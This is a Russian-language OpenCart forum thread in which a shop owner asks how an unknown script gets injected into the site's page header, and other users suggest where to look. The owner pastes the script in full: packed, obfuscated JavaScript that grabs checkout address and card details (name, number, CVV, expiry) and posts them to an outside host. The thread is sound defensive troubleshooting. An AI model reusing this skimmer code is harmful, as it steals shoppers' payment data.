Перейти к содержанию

Рекомендуемые сообщения

Доброго всем дня!

Обнаружил зловред JS. Устанавливается прямо в тег <head>. Перерыл весь сайт. Пытался найти в сорцах текст по шаблону - нет его. Не могу понять как он туда попадает. Я в ОС и вообще в программировании не силен. Подскажите плиз, где формируется хедер и как-откуда туда попадают JS. Буду рад любой помощи

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

шаблон header.tpl

контроллер header.php

 

какая версия opencart?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 минуты назад, MrBa сказал:

версия 2.2.0.0

также проверьте эти файлы в кэше модификаторов /system/storage/modification

может с каким-то модулем принесли.

 

попробуйте открыть сайт с другого браузера(чистого, без установленных дополнений) 

Изменено пользователем ardashev06

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
20 минут назад, MrBa сказал:

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

покажите скрипт. скопируйте код сюда

а лучше - предоставьте ссылку на сайт

Изменено пользователем ardashev06

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, ardashev06 сказал:

покажите скрипт. скопируйте код сюда

предоставьте ссылку на сайт

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

Только что, JIOPD сказал:

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

я же писал выше -

 

Только что, ardashev06 сказал:

искал прямо на сервере с помощью grep по шаблону.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
14 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
15 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

 

предоставьте фтп в личку, посмотрю откуда ноги растут

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 минуту назад, JIOPD сказал:

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

а вы открывали его? там ничего особенного))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, ardashev06 сказал:

а вы открывали его? там ничего особенного))

тоже глянул, не нашел ничего касаемо вопроса.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
3 минуты назад, MrBa сказал:

тоже глянул, не нашел ничего касаемо вопроса.

есть ли в header.tpl что-то между

 

<script src="catalog/view/javascript/jquery/owl-carousel/owl.carousel.min.js" type="text/javascript"></script>

 

{что-то здесь}

 

<link href='catalog/view/theme/default/stylesheet/jquery.growl.css' rel='stylesheet' type='text/css'>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, ardashev06 сказал:

есть ли в header.tpl что-то между

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
10 минут назад, MrBa сказал:

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

разумеется его вы там можете не увидеть.

 

но есть что-то между подключением скрипта и стиля? названия их выше.

 

если там вообще ничего нет,

 

то нужно смотреть установленные модификаторы

 

---

 

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

Изменено пользователем ardashev06

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
3 минуты назад, ardashev06 сказал:

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

вот и нет - он передает туда методом пост информацию. Но где он находится?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
8 минут назад, MrBa сказал:

вот и нет - он передает туда методом пост информацию. Но где он находится?

методом пост на сайт пустышку :)

 

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, ardashev06 сказал:

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

я его вычислил дебагером. Он туда шлет важные данные и вполне успешно, с возвратом - true

Те не менее спасибо за помощь. Буду искать где он хранится и как туда попадает

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.